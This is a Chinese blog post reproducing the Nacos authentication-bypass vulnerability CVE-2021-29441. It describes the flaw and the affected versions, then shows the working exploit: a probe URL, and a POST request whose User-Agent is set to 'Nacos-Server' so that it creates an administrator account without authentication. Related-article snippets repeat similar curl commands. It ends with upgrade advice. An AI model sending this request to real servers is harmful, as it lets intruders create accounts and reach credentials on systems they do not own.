【Nacos未授权访问漏洞(CVE-2021-29441)复现】

最新推荐文章于 2024-05-07 10:36:53 发布
最新推荐文章于 2024-05-07 10:36:53 发布
阅读量2.1k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络 网络安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/134057381
版权

文章目录

一、声明

本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。

二、漏洞描述

Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。
开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息

三、漏洞影响范围

Nacos版本<=Nacos 2.0.0-ALPHA.1

四、漏洞复现

1、来到登陆界面
在这里插入图片描述
2、验证是否可能存在漏洞
未登陆情况下浏览器访问如下接口

http://x.x.x.x/nacos/v1/auth/users?pageNo=1&pageSize=1

在这里插入图片描述出现这种界面就很可能存在漏洞

3、抓包修改数据包

POST /nacos/v1/auth/users?username=test10&password=test10
User-Agent: Nacos-Server
pageNo=1&pageSize=9

在这里插入图片描述
发现创建用户成功

4、返回登陆界面登陆
在这里插入图片描述

五、修复建议

升级到最新版本的 Nacos

一纸-荒芜
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
nacos配置中心nacos-server-2.2.3
08-16
在这个“nacos-server-2.2.3”压缩包中,包含了运行Nacos配置中心所需的所有文件,这使得用户可以在中国大陆地区避免由于GitHub访问问题导致的下载困难。 Nacos的核心功能之一是配置中心,它允许开发者集中管理和推...
nacos 的两个源码版本:分别是 nacos-1.4.3 和 nacos-2.0.4
02-25
Nacos 的两个主要源码版本,即 nacos-1.4.3 和 nacos-2.0.4,分别代表了项目在不同阶段的发展成果,各自具有不同的特性和改进。 首先,我们来了解一下 Nacos 的核心功能。作为一个服务注册中心,Nacos 允许微服务...
Nacos授权和身份认证漏洞修复
zyfmeng的博客
12-27 2267
nacos授权及弱身份认证漏洞修复
Nacos授权访问漏洞
00勇士王子的博客
02-27 6293
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
Nacos 认证绕过漏洞CVE-2021-29441复现
最新发布
weixin_43210943的博客
05-07 711
记一次内网Nacos漏洞复现
Alibaba Nacos权限认证绕过漏洞复现
逍遥小哥的博客
07-18 6226
是一个易于使用的平台,旨在用于动态服务发现,配置和服务管理。它可以帮助您轻松构建云本机应用程序和。2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。为什么会产生这个漏洞?1.认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。
Nacos安全漏洞修复方案:保护您的应用服务
修己xj的博客
06-16 2509
尊敬的家人们,大家好!在过去的几年中,Nacos作为阿里巴巴推出的一项开源项目,为云原生应用的构建和管理提供了许多便利。然而,最近发现了一个安全漏洞,该漏洞可能导致授权的用户获取到敏感信息。为了确保您的应用程序的安全性,我们将在本文中向您介绍修复Nacos漏洞的方案
【渗透实战】Nacos授权访问CVE-2021-29441
Nafia的博客
02-20 3000
Nacos授权访问漏洞挖掘记录
Nacos漏洞修复】Nacos授权访问漏洞(CVE-2021-29441)
m0_52985087的博客
03-20 4641
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'
nacos-server-2.0.3 nacos-server-2.0.3 nacos-server-2.0.3
04-08
nacos-server-2.0.3
nacos-server-loongarch64-2.3.0.tar.gz
12-15
本资源“nacos-server-loongarch64-2.3.0.tar.gz”是专为龙芯CPU平台定制的版本,适应了国产化硬件环境的发展需求,使得在基于龙芯CPU的计算机和服务器上部署和运行Nacos成为可能。 首先,让我们深入了解Nacos。...
最新nacos-server-2.2.0下载
12-29
总结来说,Nacos-server-2.2.0版本作为一款强大的服务治理工具,不仅提供了完善的服务发现和配置管理功能,还在性能、稳定性、用户体验上进行了显著提升,对于Windows用户来说,安装和使用也更为简便。无论是微服务...
Nacos授权访问漏洞复现
apple_52661176的博客
07-09 1267
nacos授权访问漏洞的几种姿势
CVE-2021-42342漏洞复现及docker环境搭建
axdnoob的博客
07-18 2967
CVE-2021-42342 漏洞复现
Nacos权限认证绕过漏洞CVE-2021-29441)虚拟机环境下复现
weixin_44656518的博客
08-09 409
nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。利用这个授权漏洞,攻击者可以获取到用户名密码等敏感信息。
Nacos 授权访问漏洞复现
weixin_58609150的博客
07-08 616
POST http://IP:端口/nacos/v1/auth/users?漏洞地址:GET http://IP:端口/nacos/v1/auth/users?输入任意密码bp抓包修改返回包即可绕过进入后台。抓包将get方式修改为post并重放。
Nacos漏洞总结复现
热门推荐
渗透测试研究中心
03-23 1万+
Nacos漏洞总结复现一、Nacos默认key导致权限绕过登陆0x00 漏洞描述Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户0x01漏洞影响0.1.0 <= Nacos <= 2.2.00x02 漏洞搜索fofa:app="NACOS"0x03 ...
Nacos授权访问漏洞 修复方法
梵法利亚的博客
12-13 8506
漏洞概述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 修复方式 若业务环境允许,使用白名单限制相关web项目的访问来降低风险。 官方已发布最新安全版本,请及时下载升级至安全版本。 ...
NacosJWT密钥硬编码漏洞授权访问
whoami
03-15 2008
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。
nacos权限绕过漏洞(CVE-2021-29441)
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名密码等敏感信息。该漏洞的原因是开发者将协商好的user-agent设置为"Nacos-Server",直接硬编码在了代码里,导致了漏洞的出现。攻击者可以通过发送特定的请求,来添加一个新用户,账号密码都为vulhub,然后使用新建的账号进行登录,从而绕过认证。在漏洞利用过程中,只需要用到nacosweb访问端口8848。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值